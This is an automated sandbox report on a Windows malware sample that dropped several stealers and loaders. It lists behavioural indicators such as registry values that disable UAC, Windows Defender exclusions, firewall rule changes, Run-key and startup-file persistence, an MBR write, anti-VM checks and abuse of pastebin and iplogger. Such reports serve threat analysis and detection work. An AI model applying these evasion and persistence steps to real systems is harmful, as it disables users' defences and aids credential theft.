Malware Analysis Report

2024-07-11 11:02

Sample ID 240530-c5wswabe8s
Target 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8
SHA256 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8
Tags
amadey lumma privateloader redline risepro stealc 0e6740 1 49e482 @logscloudyt_bot zzvv bootkit discovery evasion execution infostealer loader persistence spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK Matrix
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8

Threat Level: Known bad

The file 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8 was found to be: Known bad.

Malicious Activity Summary


Windows security bypass

Stealc

RisePro

RedLine payload

Modifies firewall policy service

RedLine

PrivateLoader

Lumma Stealer

Amadey

UAC bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Checks BIOS information in registry

Reads data files stored by FTP clients

Windows security modification

Executes dropped EXE

Identifies Wine through registry keys

Drops startup file

Loads dropped DLL

Checks computer location settings

Themida packer

Reads user/profile data of web browsers

Writes to the Master Boot Record (MBR)

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops Chrome extension

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

Modifies system certificate store

Enumerates system info in registry

Checks processor information in registry

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

System policy modification

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-30 02:40

Signatures

Unsigned PE

Description Indicator Process Target
(1 match; no indicator details recorded)

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 02:40

Reported

2024-05-30 02:42

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

Signatures

Amadey

trojan amadey

Lumma Stealer

stealer lumma

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
(4 matches; no indicator details recorded)

RisePro

stealer risepro

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2I3Dpn1n9twDM8B0Noo8MrsJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FzGh3IbIVndMAjaAvbCaqKDS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JuISH5MtYdVy37r5ZyVVjAYK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2iPQtGlebLsn6Pdza6xipLaV.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smoAxtWbhsqvyUzBeMhPenqt.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TIssk4QAYpbldUs5QXJhFEq8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
N/A N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A
N/A N/A C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
N/A N/A C:\Users\Admin\Pictures\1sV0V74o6XuxHDx0lr3ZwrZy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSE9DE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
(7 matches; no indicator details recorded)

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3ffd83c1a0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\3ffd83c1a0.exe" C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\tegRANPZONsU2\wojZtnp.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\TRIFhIf.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
